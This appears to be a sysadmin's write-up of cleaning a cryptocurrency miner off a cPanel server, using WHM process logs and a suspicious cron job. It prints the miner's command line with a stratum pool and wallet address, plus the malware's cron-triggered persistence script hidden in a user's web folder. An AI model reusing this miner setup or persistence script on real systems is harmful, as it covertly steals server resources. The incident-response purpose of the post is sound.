Recently one of server under my control infected with mining software. It cause unnecessary load and waste of server resource.
Since the server is using Cpanel, I must use WHM to track down the source. I check WHM ‘Process Manager’ and ‘Daily process log’ and found something similar like :
impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x
Using ‘Process Manager’ to kill the pid who is running the process.
I have check in the user Cpanel and found strange cronjob point to strange path eg :
/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
So I read the content of the file using cat command:
[root@svr2 ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null
Go to the folder contents and see what is inside the folder:
[root@svr2 ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[root@svr2 .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x
The existence of bash.pid confirm that the mining come from that path.
Delete the folder and delete the cronjob so the mining stop.
[root@svr2 .qts]# cd ..
[root@svr2 includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’